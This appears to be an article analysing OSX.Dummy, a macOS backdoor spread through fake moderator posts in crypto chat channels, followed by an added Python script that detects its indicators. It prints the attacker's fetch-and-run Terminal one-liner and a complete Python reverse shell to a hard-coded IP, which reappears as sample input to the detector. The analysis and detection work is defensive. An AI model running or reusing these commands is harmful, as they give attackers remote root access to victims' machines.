Someone impersonating moderators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms is trying to trick users into installing macOS malware. The social engineering consists of posting a script in the discussions and encouraging people to copy and paste it into a Terminal window on their Macs. The script downloads a large file (34 megabytes) and executes it, setting up a remote connection that acts as a back door for the attacker.
Patrick Wardle, a Mac malware expert, also analyzed the malware and called it “OSX.Dummy” because, as he wrote:
- The infection method is dumb
- The massive size of the binary is dumb
- The persistence is lame (and thus also dumb)
- The capabilities are rather limited (and thus rather dumb)
- It is trivial to detect at every step (that dumb)
- And finally, the malware saves the user’s password to dumpdummy
The one-line command, first noticed by Remco Verhoef of SANS, fetches its payload from a remote server, makes the downloaded file executable, and runs it. It looks like this:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
The oversized binary bundles a host of libraries, including OpenSSL libraries used to encrypt its communications back to the command-and-control server, a system running in the data center of hosting provider CrownCloud. Once running, the script uses the sudo command to run itself as the macOS root user. For that to happen, the victim has to enter a password to allow the script to continue. The script stores that password in a temporary file called “dumpdummy”. With root privileges, the script also adds itself to macOS’s startup items, making itself persistent across reboots.
The code behind the persistence script, as Wardle notes, is a bash loop that repeatedly launches a one-line Python reverse shell, connecting to a hard-coded IP address on port 1337, an obvious bit of leetspeak comedy:
#!/bin/bash
while :
do
    python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    sleep 5
done
The motive for the attack is not yet clear. But because all of this is run through a Terminal window, it bypasses macOS’s Gatekeeper protection even though the code is unsigned. And it gives the attacker the ability to run command-line code as the root user on infected Macs. The only defense the script has to overcome is the victim’s common sense.
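Every one of the indicators the article lists is trivial to check for, which is exactly Wardle’s point. The following script, added here as an example and not part of the original article or of Wardle’s or Verhoef’s analyses, turns those indicators into detection logic: it recognizes the building blocks of the Python reverse shell (socket connect, dup2 of the socket onto stdin/stdout/stderr, an interactive /bin/sh), pulls the hard-coded command-and-control host and port out of the script, and looks for the cached-password file and a live connection to the C2 address. The persistence script, the /tmp listing and the netstat-style lines it inspects are constructed inline so it runs offline; the IP, port and file name are the ones reported in the article.

```python
"""Hunt for the OSX.Dummy indicators described in the article (added example)."""
import re

# Indicators reported in the article.
C2_HOST = "185.243.115.230"
C2_PORT = 1337
PASSWORD_DUMP = "/tmp/dumpdummy"

# Building blocks of the one-line Python reverse shell: open a TCP socket,
# duplicate it onto fds 0/1/2, then hand those fds to an interactive /bin/sh.
REVERSE_SHELL_MARKERS = (
    re.compile(r"import\s+socket"),
    re.compile(r"socket\.socket\("),
    re.compile(r"os\.dup2\("),
    re.compile(r'subprocess\.call\([\[(]\s*"/bin/sh"'),
)
CONNECT_CALL = re.compile(r'connect\(\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)\)')


def looks_like_reverse_shell(script_text):
    """True when a script contains all of the reverse-shell building blocks."""
    return all(p.search(script_text) for p in REVERSE_SHELL_MARKERS)


def c2_targets(script_text):
    """Return the (host, port) pairs passed to socket.connect() in the script."""
    return [(host, int(port)) for host, port in CONNECT_CALL.findall(script_text)]


def flag_connections(netstat_lines):
    """Return netstat -an style lines that involve the C2 host and port.

    macOS prints the peer as host.port, Linux as host:port; accept both.
    """
    mac_style = f"{C2_HOST}.{C2_PORT}"
    linux_style = f"{C2_HOST}:{C2_PORT}"
    return [line for line in netstat_lines if mac_style in line or linux_style in line]


def scan(script_text, tmp_listing, netstat_lines):
    """Combine the checks into a list of human-readable findings."""
    findings = []
    if looks_like_reverse_shell(script_text):
        findings.append("reverse shell pattern in persistence script")
    for host, port in c2_targets(script_text):
        if host == C2_HOST and port == C2_PORT:
            findings.append(f"hard-coded C2 {host}:{port}")
    if PASSWORD_DUMP in tmp_listing:
        findings.append(f"cached sudo password at {PASSWORD_DUMP}")
    if flag_connections(netstat_lines):
        findings.append("live connection to C2")
    return findings


# Constructed sample input (not captured from a real machine): the persistence
# loop quoted in the article, a fake /tmp listing and two fake netstat lines.
SAMPLE_SCRIPT = r"""#!/bin/bash
while :
do
    python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    sleep 5
done
"""
SAMPLE_TMP_LISTING = ["/tmp/com.apple.launchd.abc123", "/tmp/dumpdummy", "/tmp/script"]
SAMPLE_NETSTAT = [
    "tcp4       0      0  192.168.1.20.52311     17.253.144.10.443      ESTABLISHED",
    "tcp4       0      0  192.168.1.20.52340     185.243.115.230.1337   ESTABLISHED",
]
BENIGN_SCRIPT = "#!/bin/bash\nwhile :\ndo\n    date >> /tmp/heartbeat\n    sleep 5\ndone\n"

if __name__ == "__main__":
    for finding in scan(SAMPLE_SCRIPT, SAMPLE_TMP_LISTING, SAMPLE_NETSTAT):
        print("FOUND:", finding)
    print("benign script flagged:", bool(scan(BENIGN_SCRIPT, [], [])))
```

On a real Mac the same checks would be fed by `cat` of the startup script, `ls /tmp`, and `netstat -an`; the pattern matching is deliberately loose on whitespace so that trivial reformatting of the one-liner does not evade it, but a rewrite in another language (or a different connect syntax) would, which is why the file and network indicators are checked independently.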